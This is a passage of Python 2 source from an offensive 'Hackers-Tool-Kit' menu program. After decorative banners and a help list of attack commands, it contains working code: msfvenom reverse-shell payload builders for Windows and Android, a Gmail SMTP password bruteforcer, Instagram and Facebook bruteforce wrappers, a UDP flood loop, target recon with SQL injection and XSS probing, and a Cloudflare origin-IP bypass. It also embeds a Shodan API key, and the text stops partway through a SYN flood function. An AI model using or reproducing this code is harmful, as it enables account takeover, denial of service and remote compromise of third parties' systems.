██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') +def mainbanner21(): + os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,21) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() + if num == 21: + mainbanner21() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + 